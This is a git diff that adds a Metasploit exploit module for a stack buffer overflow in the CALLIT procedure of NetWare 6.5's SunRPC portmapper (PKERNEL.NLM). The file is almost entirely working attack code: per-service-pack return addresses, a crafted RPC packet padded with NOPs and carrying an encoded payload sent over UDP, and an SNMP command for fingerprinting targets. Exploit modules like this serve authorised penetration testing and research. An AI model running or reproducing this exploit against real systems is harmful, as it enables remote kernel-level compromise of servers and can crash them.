diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb new file mode 100755 index 0000000000..7a4dd5878d --- /dev/null +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -0,0 +1,92 @@ +## +# NetWare 6.5 NFS - Portmapper and RPC Module Buffer Overflow (CALLIT procedure) +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure. + PKERNEL.NLM is installed by default on all NetWare servers to support NFS. + The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can + cause the operating system to reboot. + }, + 'Author' => [ 'pahtzo', ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + # There is no CVE for this vulnerability + [ 'BID', '36564' ], + [ 'OSVDB', '58447' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-067/' ], + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 2020, + }, + 'Platform' => 'netware', + 'Targets' => + [ + # NetWare SP and PKERNEL.NLM version can be found in SNMP: + # snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm" + # sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008 + # hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)" + [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm) + [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm) + [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm) + [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm) + [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm) + [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm) + [ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm) + ], + + 'DisclosureDate' => 'Oct 01 2009')) + + register_options([Opt::RPORT(111)], self.class) + end + + def exploit + connect_udp + + buf = [rand(0xffffffff)].pack('N') # XID + buf << [0].pack('N') # Message Type: Call (0) + buf << [2].pack('N') # RPC Version: 2 + buf << [100000].pack('N') # Program: Portmap (100000) + buf << [2].pack('N') # Program Version: 2 + buf << [5].pack('N') # Procedure: CALLIT (5) + buf << [0].pack('N') # Credentials AUTH_NULL (0) + buf << [0].pack('N') # Length: 0 + buf << [0].pack('N') # Verifier AUTH_NULL (0) + buf << [0].pack('N') # Length: 0 + buf << [0].pack('N') # Program: Unknown (0) + buf << [1].pack('N') # Version: 1 + buf << [1].pack('N') # Procedure: proc-1 (1) + buf << [4097].pack('N') # Arguments: length: 4097 + + buf << make_nops(2072) # fill to ret + buf << [target.ret].pack('V') # addr. of push esp - ret + buf << payload.encoded # + +# print_status("payload space #{payload_space()}...") +# print_status("payload len #{payload.encoded.length}...") +# print_status("total buf len #{buf.length}...") + + print_status("Trying target #{target.name}...") + + udp_sock.put(buf) + handler + disconnect_udp + end + +end +